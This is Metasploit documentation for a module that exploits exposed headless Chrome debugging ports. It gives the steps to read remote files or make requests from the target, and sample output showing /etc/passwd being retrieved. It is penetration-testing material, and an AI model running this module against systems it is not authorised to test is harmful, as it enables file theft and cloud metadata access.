metasploit-framework/documentation/modules/auxiliary/gather/chrome_debugger.md

1.3 KiB

Vulnerable Application

This module takes advantage of misconfigured headless chrome sessions and either retrieves a specified file off the remote file system, or makes a web request from the remote machine.

This can be useful for retrieving cloud metadata in certain scenarios. Primarily this module targets developers.

A vulnerable Headless Chrome session can be started with the following command:

$ google-chrome --remote-debugging-port=9222 --headless --remote-debugging-address=0.0.0.0

This will start a webserver running on port 9222 for all network interfaces.

Verification Steps

  1. Start msfconsole
  2. Execute auxiliary/gather/chrome_debugger
  3. Execute set RHOST $REMOTE_ADDRESS
  4. Execute set RPORT 9222
  5. Execute either set FILEPATH $FILE_PATH_ON_REMOTE or set URL $URL_FROM_REMOTE
  6. Execute run

Options

FILEPATH

The file path on the remote you wish to retrieve.

URL

A URL you wish to fetch the contents of from the remote machine.

Note: One or the other must be set!

Scenarios

[*] Attempting Connection to ws://192.168.20.168:9222/devtools/page/CF551031373306B35F961C6C0968DAEC
[*] Opened connection
[*] Attempting to load url file:///etc/passwd
[*] Received Data
[*] Sending request for data
[*] Received Data
[+] Retrieved resource
[*] Auxiliary module execution completed